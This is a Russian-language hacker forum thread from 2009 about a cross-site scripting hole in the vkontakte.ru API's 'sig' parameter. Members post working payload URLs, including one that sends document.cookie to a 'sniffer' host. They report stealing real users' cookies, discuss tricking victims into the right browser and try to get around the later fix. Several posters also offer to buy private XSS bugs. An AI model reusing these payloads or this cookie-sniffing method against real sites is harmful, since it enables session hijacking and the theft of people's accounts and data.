Просмотр полной версии : Active xss vkontakte.ru
http://api.vkontakte.ru/api.php?v=2.0&sig=%3Cscript%3Ealert(document.cookie)%3C/script%3E&format=JSON&api_id=517649&method=getAppFriends
Добейте
http://forums.goha.ru/images/smilies/pandaredlol.gif
Ты уверен, что это активка? =\
И в опере не катит =\
Да в Опере не пашет и в Internet Explorer тоже
слэш в закрывающем тэге экранируется, а так бы сработало
BlackSun
27.05.2009, 10:10
Изя лох :( это пассивка,
http://api.vkontakte.ru/api.php?v=2.0&sig=<img+src=.+onerror=alert()>&format=JSON&api_id=517649&method=getAppFriends
wildshaman
27.05.2009, 10:20
А изя промазнулся, а изя проманхнулся :D
wildshaman
27.05.2009, 10:21
мб перенесете в приват? А то щас же школья набежит тут, а чо, а кто, а зачем это и т д...
Ха токо в IE пашет и это пассивка, нафиг она, все щас сидят на мозиле и опере. Так уж при впаривании надо говорить зайди через такой браузер иначе страница не загрузится.
Я две нашел в более легких условиях и где досих пор пашет))
brain[pillow]
27.05.2009, 11:11
Это пассивка и пашет она под все браузеры
wildshaman
27.05.2009, 11:31
Ха токо в IE пашет и это пассивка, нафиг она, все щас сидят на мозиле и опере. Так уж при впаривании надо говорить зайди через такой браузер иначе страница не загрузится.
Я две нашел в более легких условиях и где досих пор пашет))
dj всех браузерах работает :)
FatalLerr0r
27.05.2009, 12:06
перенесите в приват!!!!!
LiteMentaL
27.05.2009, 12:21
поздно переносить, уже прикрыли
wildshaman
27.05.2009, 12:25
поздно переносить, уже прикрыли
не-а ;)
cylaaaan
27.05.2009, 20:36
а толку, слеши фильтруют, никак ссылку ввести не получается)
Nightmarе
27.05.2009, 21:06
Спасибо ребят, сейчас будем проводить апирацию "ПАПЬЯНЕ111"
Dj-Matrix
27.05.2009, 21:58
Работает в Firefox:
http://api.vkontakte.ru/api.php?v=2.0&sig=<iframe+src=.+onload=location.href='http://sniffer?'%2Bdocument.cookie>&format=JSON
cylaaaan
27.05.2009, 23:29
в опере тож
я просто забыл что такое хекер и чем отличаются пассивные поцаны и активные
vitalikis
28.05.2009, 12:14
лучше б тему потерли
Удалите нах тему, или редактируйте свои посты, прикроют же...
Изя лох :( это пассивка,
http://api.vkontakte.ru/api.php?v=2.0&sig=<img+src=.+onerror=alert()>&format=JSON&api_id=517649&method=getAppFriends
:-D
:-D :-D
:-D :-D :-D :-D :-D :-D :-D
:-D :-D :-D :-D :-D :-D :-D :-D :-D
:-D :-D
:-D :-D :-D :-D
потрите посты) хотя уже поздно =//
______
upd: спасибо за XSS'ку)))) за сегодня уже 4к рейта набрал))))
______
upd2: смотрю логи, а там даже куки чака))) :rolleyes:
еще попался чел из АК47 белобрысый))) :D :rolleyes:
Ustas.PC
04.06.2009, 20:42
прикрыли походу, у меня не работает уже =\
brain[pillow]
04.06.2009, 21:09
Угу, пофиксили
gosuindahouse
04.06.2009, 21:53
днем еще работало, бля...
Damned_one
04.06.2009, 22:02
кхм.. ну тёрли бы тогда чтоли отсюдова.. сами виноваты
[ Dumi ]
04.06.2009, 22:03
не*** апать тему было
Damned_one
04.06.2009, 22:11
народ, а есть шанс немного переписать ее? всмысле можно повертеть с фильтрами или они образноговоря одним щелчком мыши применили свои мегакрутые фильтры для этого поля?
Короче говоря стоит ли овечка выделки?
wildshaman
04.06.2009, 22:16
народ, а есть шанс немного переписать ее? всмысле можно повертеть с фильтрами или они образноговоря одним щелчком мыши применили свои мегакрутые фильтры для этого поля?
Короче говоря стоит ли овечка выделки?
ничего не выйдет, там хтмлспецчарс
[ Dumi ]
04.06.2009, 22:25
как бэ там тоже не дураки но всеравно спасябо изосу я дурова опхекал
Damned_one
04.06.2009, 22:35
какбы у меня появилось предложение жаль невовремя - надо было раз уже не захотели сразу тем утереть рассылать всем сообщения чтоб трындели "уже прикрыли" zzzz
Еще вопросик, а как с API вконтакте работать? Всмысле ручками потрогать все эти поля
Damned_one
05.06.2009, 20:15
а у когонить такое вылетало?
<?xml version="1.0" encoding="utf-8" ?>
- <error>
<error_code>101</error_code>
<error_msg>Invalid application API ID</error_msg>
- <request_params list="true">
- <param>
<key>v</key>
<value>2.0</value>
</param>
- <param>
<key>sig</key>
<value>'; бывшее поле ввода хсс</value>
</param>
- <param>
<key>format</key>
<value>JSON";</value>
</param>
</request_params>
</error>
Ustas.PC
06.06.2009, 00:04
нет.
Ustas.PC
06.06.2009, 00:24
короче я сдесь чето помудился, зашол на api.vkontakte.ru/api.php
открыл исходник и что же там написано ? а написано там
<?xml version="1.0" encoding="utf-8"?>
<error>Invalid application API ID</error>
к нашему скрипту
http://api.vkontakte.ru/api.php?v=2.0&sig=<iframe+src=.+onload=location.href='http://sniffer?'%2Bdocument.cookie>&format=JSON
там где v=2.0 я поменял на v=1.0
тоесть получился
http://api.vkontakte.ru/api.php?v=1.0&sig=<iframe+src=.+onload=location.href='http://sniffer?'%2Bdocument.cookie>&format=JSON
теперь пишит
{"error":"Invalid application API ID"}
теперь потрепаюсь над этим может что нибудт и получиться......
А изя промазнулся, а изя проманхнулся :D
АВРАМ ПЕРЕСТАНЬ ИЗДЕВАТЬСЯ НАД МАЛЕНЬКИМ! :D :D :D :D :D :D
ZayabisSurfer
06.06.2009, 17:08
XSS то работала! Не пойму нах в паблик было кидать ?)) Можно было в приват скинуть и реально подняться. Если ещё кто баги найдёт,пишите в личку,хорошо заплачу за подобные XSSы
---------
Изя , ты коммерчески не подкован ))
Если бы ее в приват кидали, ты бы ее и не поюзал как и сейчас, а че вы все ноите, там их щас ппц много стало. У меня уже активка и две пассивки!!!
Если бы ее в приват кидали, ты бы ее и не поюзал как и сейчас, а че вы все ноите, там их щас ппц много стало. У меня уже активка и две пассивки!!!
Ну дык делись! )
Если бы ее в приват кидали, ты бы ее и не поюзал как и сейчас, а че вы все ноите, там их щас ппц много стало. У меня уже активка и две пассивки!!!
подскажи хоть приблизительно где искать :) в ПМ, с меня +++ )
MasterProg
10.06.2009, 20:00
И мне! xD
в каком направлении рыть?
поднимаю тему и подключаюсь)
ZayabisSurfer
14.06.2009, 16:30
Заплачу дорого за XSS
Нашедшие пишите в PM ,только известные гаранты!!!
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot